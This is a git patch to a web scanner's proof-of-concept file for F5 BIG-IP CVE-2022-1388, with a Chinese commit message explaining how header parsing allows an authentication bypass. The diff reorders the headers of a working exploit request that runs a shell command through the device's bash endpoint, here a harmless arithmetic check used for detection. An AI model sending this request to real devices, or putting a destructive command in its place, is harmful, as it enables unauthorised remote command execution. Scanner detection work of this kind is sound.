From 85e636fceaadcf7ac6271eafb91396bdc7b98873 Mon Sep 17 00:00:00 2001
From: jindaxia <jindaxia@users.noreply.github.com>
Date: Thu, 19 May 2022 17:34:57 +0800
Subject: [PATCH] =?UTF-8?q?fix:=20=E4=BF=AE=E5=A4=8D2022-188=E7=9A=84poc?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

header里面Connection属性keep-alive后面的逗号","
使得后面的x auth token字段解析出现错误, 从而绕过验证
---
 WebScan/pocs/f5-cve-2022-1388.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/WebScan/pocs/f5-cve-2022-1388.yml b/WebScan/pocs/f5-cve-2022-1388.yml
index a665f82..8eada04 100644
--- a/WebScan/pocs/f5-cve-2022-1388.yml
+++ b/WebScan/pocs/f5-cve-2022-1388.yml
@@ -8,8 +8,8 @@ rules:
     headers:
       Content-Type: application/json
       Connection: keep-alive, x-F5-Auth-Token
-      Authorization: Basic YWRtaW46
       X-F5-Auth-Token: a
+      Authorization: Basic YWRtaW46
     body: >-
       {"command":"run","utilCmdArgs":"-c 'expr {{r1}} + {{r2}}'"}
     follow_redirects: false